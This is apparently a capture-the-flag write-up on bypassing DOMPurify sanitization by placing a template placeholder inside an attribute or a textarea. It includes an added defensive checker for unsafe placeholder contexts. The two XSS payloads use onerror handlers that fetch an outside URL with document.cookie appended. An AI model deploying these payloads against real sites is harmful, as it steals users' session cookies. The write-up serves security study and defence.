Tags: html dompurify web 

One solution is to put `{{content}}` inside an attribute and to close the quote in the inner payload:

```html

```

```html
" onerror="fetch('{YOUR_URL}'+document.cookie)
```

An alternative solution is to close a `<textarea>`, as described in the "Bad usage | Not enough context" section of [Exploring the DOMPurify library: Hunting for Misconfigurations (2/2)](https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations#bad-usage-not-enough-context) on mizu.re:

```html
<textarea>{{content}}</textarea>
```

```html
<div id="</textarea><img src=x onerror=fetch('{YOUR_URL}'+document.cookie)>"></div>
```
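A defender-side check for the template pattern both solutions rely on, as an added example that is not from the original writeup or the challenge: it flags layouts where `{{content}}` sits in an attribute value or in the body of a text-only element such as `<textarea>`, where separately sanitized markup changes meaning after substitution. The function name, the element list and the sample layouts are assumptions constructed for illustration, and the input is assumed to be well-formed, already serialized HTML.

```javascript
// Elements whose body is parsed as text (RCDATA / raw text): markup inside is
// inert while they are open and turns live once a substituted value closes them.
const TEXT_ONLY = new Set(['textarea', 'title', 'style', 'script', 'xmp',
  'iframe', 'noembed', 'noframes', 'noscript', 'plaintext']);

// One start or end tag, with quoted attribute values kept intact.
const TAG = /<(\/?)([a-zA-Z][^\s\/>]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;

// Returns a description of every place where the placeholder is not in
// ordinary element content (hypothetical helper, not a DOMPurify API).
function unsafePlaceholderContexts(layout, placeholder = '{{content}}') {
  const findings = [];
  const lower = layout.toLowerCase();
  TAG.lastIndex = 0;
  let m;
  while ((m = TAG.exec(layout)) !== null) {
    const name = m[2].toLowerCase();
    // Placeholder inside the tag itself: the value can end the quoted
    // attribute and add new attributes.
    if (m[3].includes(placeholder)) findings.push(`attribute of <${name}>`);
    if (m[1] === '/' || !TEXT_ONLY.has(name)) continue;
    // Start tag of a text-only element: its body runs to the matching end tag.
    let end = lower.indexOf(`</${name}`, TAG.lastIndex);
    if (end === -1) end = layout.length;
    if (layout.slice(TAG.lastIndex, end).includes(placeholder)) {
      findings.push(`body of <${name}>`);
    }
    TAG.lastIndex = end; // skip the body, it contains no real tags
  }
  return findings;
}

// Constructed sample layouts (not taken from the challenge).
const samples = [
  '<div>{{content}}</div>',
  '<img src="{{content}}">',
  '<textarea>{{content}}</textarea>',
];
for (const s of samples) {
  console.log(s, '=>', unsafePlaceholderContexts(s));
}
```

An empty result means the placeholder only appears in ordinary element content; sanitizing the final substituted HTML once more remains the stronger control.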

Original writeup (https://ouuan.moe/post/2025/03/tpctf-2025#baby-layout-81-solves).